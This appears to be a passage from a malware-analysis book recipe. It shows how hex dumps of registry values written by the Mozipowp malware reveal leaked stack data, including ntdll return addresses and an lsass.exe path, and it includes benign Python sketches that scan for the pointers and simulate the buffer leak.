 Dumps and prints details about interesting registry artifacts. <filename> [-a] [-b] [-p] [-i] [-h] [-s]

    -a or --all         dump all (everything below)

    -b or --base64      find base64 encoded strings

    -p or --pe          find pe files (dll/exe/sys)

    -i or --ipaddr      find dot quad ip addresses

    -h or --http        find http urls

    -s or --binstr      find binary data disguised as a string

 $ perl NTUSER.DAT -s


LastWrite Sat Jun 26 20:37:53 2010 (UTC)

Value: Last Date

Type: REG_SZ

       0  32003600 2d003600 2d003200 30003100 2.6.-.6.-.2.0.1.

      10  30000000 6d005000 72006f00 63005c00 0...m.P.r.o.c.\.

      20  6c007300 61007300 73002e00 65007800 l.s.a.s.s...e.x.

      30  65000000                            e...  


LastWrite Sat Jun 26 20:37:53 2010 (UTC)

Value: Popup time

Type: REG_SZ

       0 30000000 00000001 30e32200 e2e92243 0.......0."..."C

      10 00000000 00000000 e2e92200 3504917c ..........".5..|

      20 3e04917c 7d070000 08e22200 d8e52200 >..|}....."...".

      30 48e5                                H.  


LastWrite Sat Jun 26 20:37:53 2010 (UTC)

Value: Popup date

Type: REG_SZ

       0 30000000 6f006300 75006d00 65006e00 0...o.c.u.m.e.n.

      10 74007300 20006100 6e006400 20005300 t.s. .a.n.d. .S.

      20 65007400 74006900 6e006700 73005c00 e.t.t.i.n.g.s.\.

      30 4100                                A. 


The script identified the same values under HKEY_CURRENT_USER\Identities as mentioned before. In Figure 10-11, using Regedit, you saw the Last Date value containing 26-6-2010. However, in the output here, you see 26-6-2010 followed by some extraneous data—another Unicode string, mProc\lsass.exe. What is the significance of this extra string and where did it come from?

While you’re thinking, check out the Popup time value. It contains the Unicode string 0, which is 30 00 00 00 in hex (the dump shows it as 30000000 so the lines don’t wrap on the page). Everything after those four bytes is extraneous. Look very carefully and you’ll see some interesting values. For example, 7d 07 00 00 is 0x77D when read as a little-endian value, or 1917 decimal. Is this perhaps a field from a structure that was left on the stack? Right before it, you can find 35 04 91 7c (0x7c910435) and 3e 04 91 7c (0x7c91043e). On an XP system, it’s typical to find ntdll.dll mapped somewhere in this memory region. In fact, when we went back to look, ntdll.dll was loaded between 0x7c900000 and 0x7c9b2000. Both addresses in the Registry are within range of ntdll.dll. Why did we find addresses in the Registry?
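Spotting addresses by eye gets tedious, so here is a short Python sketch of how the search could be automated. It is an illustration only: it reads the Popup time bytes from the dump above as little-endian 32-bit values on 4-byte boundaries (an assumption, since leaked pointers are not guaranteed to be aligned to the start of the value) and reports those that fall inside the ntdll.dll range mentioned above.

```python
import struct

# The 50 bytes of the Popup time value, copied from the hex dump
popup_time = bytes.fromhex(
    "30000000" "00000001" "30e32200" "e2e92243"
    "00000000" "00000000" "e2e92200" "3504917c"
    "3e04917c" "7d070000" "08e22200" "d8e52200"
    "48e5")


def pointers_in_range(data, start, end):
    """Return (offset, value) for each aligned DWORD with start <= value < end."""
    usable = len(data) - len(data) % 4    # ignore a trailing partial DWORD
    hits = []
    for off in range(0, usable, 4):
        (value,) = struct.unpack_from("<I", data, off)
        if start <= value < end:
            hits.append((off, value))
    return hits


# Load range of ntdll.dll on the test machine, as given in the text
NTDLL_START, NTDLL_END = 0x7C900000, 0x7C9B2000

for off, value in pointers_in_range(popup_time, NTDLL_START, NTDLL_END):
    print("offset 0x%02x: 0x%08x" % (off, value))
```

The same function works for any module if you substitute its load range, which you would normally take from a memory dump or a live process listing of the infected machine.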

Mozipowp Spilled the Beans

As it turns out, the malware author declared multiple fixed-size stack buffers to store the strings that it would later write into the Registry. It never zeroed out the stack buffer (for example, using memset) before copying the string into the buffer. The string’s length was much shorter than the buffer in which it was contained and then, as described previously, the malware wrote the entire buffer to the Registry with RegSetValueEx. Whatever was on the program’s stack at the time ended up at the end of each buffer, and thus became the extraneous data in the Registry.

Figure 10-12 shows a disassembly of ntdll.dll in IDA Pro. It proves that the 0x7c910435 and 0x7c91043e values we found are actually return addresses that remained on the stack from when the program previously called RtlAcquirePebLock. Windows API functions, such as GetEnvironmentVariable, make calls into RtlAcquirePebLock. This is very interesting because a post-mortem forensic analysis of a Registry hive is not supposed to show what API functions malware called prior to creating a Registry value!

Figure 10-12: Disassembly of RtlAcquirePebLock shows the addresses we found in the Registry.


How Much Data Gets Leaked?

But wait, there’s more! Figure 10-13 shows a decompilation (using the Hex-Rays plug-in for IDA Pro) of the function within the Mozipowp binary that creates the various Registry values. We’ve named the function SetRegistryValues. As an example, you can see the program declares a stack buffer like __int16 szLastDate[50]. The __int16 data type is the same as a WCHAR, which is a Unicode character. Thus, each __int16 is 16 bits (2 bytes). This means the buffer takes up 100 bytes on the stack. The malware uses wsprintfW to build a formatted string such as 26-6-2010, and copies it into the szLastDate buffer. This 10-character date string (including the trailing NULL) requires 20 of those 100 bytes, and the remaining 80 are untouched. When the malware uses RegSetValueEx, it specifies that the string’s length is 50 bytes. Therefore, 50 - 20 = 30 bytes of extraneous data get leaked into the Registry!
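The arithmetic is easy to reproduce. The Python sketch below simulates the bug rather than the malware's actual code: a 100-byte buffer starts out filled with stale bytes (0xAA is an arbitrary placeholder for whatever was on the stack), the date string is copied in without zeroing the buffer first, and the first 50 bytes are then "written" to the Registry.

```python
def simulate_leak(stale_stack, text, cb_data):
    """Return (bytes written to the Registry, leaked portion of those bytes)."""
    buf = bytearray(stale_stack)                 # buffer is never zeroed
    encoded = (text + "\0").encode("utf-16-le")  # string plus trailing NULL
    buf[:len(encoded)] = encoded                 # wsprintfW-style copy
    written = bytes(buf[:cb_data])               # RegSetValueEx with cbData
    return written, written[len(encoded):]


# __int16 szLastDate[50] occupies 50 * 2 = 100 bytes on the stack
stale = bytes([0xAA]) * 100

written, leaked = simulate_leak(stale, "26-6-2010", 50)
print("written: %d bytes, leaked: %d bytes" % (len(written), len(leaked)))
```

Zeroing the buffer first, or passing the real string length as the size, would reduce the leaked portion to nothing.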

What about Lsass?

Now, what about the significance of the mProc\lsass.exe string? We used IDA Pro to view a disassembly of the function that called SetRegistryValues. The calling function’s local variables would still be on the stack if SetRegistryValues did not zero out its own stack buffers before usage. Sure enough, as you can see in Figure 10-14, the calling function uses GetEnvironmentVariable to find the application data path (i.e., C:\Documents and Settings\Username\Application Data). This explains why we found the return addresses from RtlAcquirePebLock. Then it appends \SystemProc\lsass.exe to the path, which explains why we found mProc\lsass.exe.

Figure 10-13: Decompilation using the Hex-Rays plug-in to create Registry values


Figure 10-14: The return addresses and lsass strings are artifacts from this function’s code.


In this recipe, you saw how it is possible to find binary data disguised as a string. Then you saw how to investigate the significance of the binary data by statically analyzing the malware’s executable. Using these clues, you gained further information about which APIs the malware called right before creating the Registry values and some other locations on disk where you may look for components of the malware. We’ll wrap up this recipe with the following points:

·           Mark Russinovich’s Reghide31 is a proof-of-concept tool that exploits character encodings between the Windows API and the native API. By creating a key in the Registry with a NULL character in its name, user mode applications such as regedit cannot open the key.

·           Halvar Flake presented Attacks on Uninitialized Local Variables33 at Black Hat Federal 2006. The talk described how it’s possible to control the values on a program’s stack if it fails to initialize its variables or zero out its buffers.

·           You can use the Registry viewer included with Parse::Win32Registry to browse a Windows Registry hive on a Linux system. Because the viewer shows a hex dump of the data regardless of its data type, you can see the extraneous bytes that Regedit does not show.

·           For an entirely different type of Registry “slack space,” see Jolanta Thomassen’s dissertation titled Forensic Analysis of Unallocated Space in Windows Registry Hive Files.32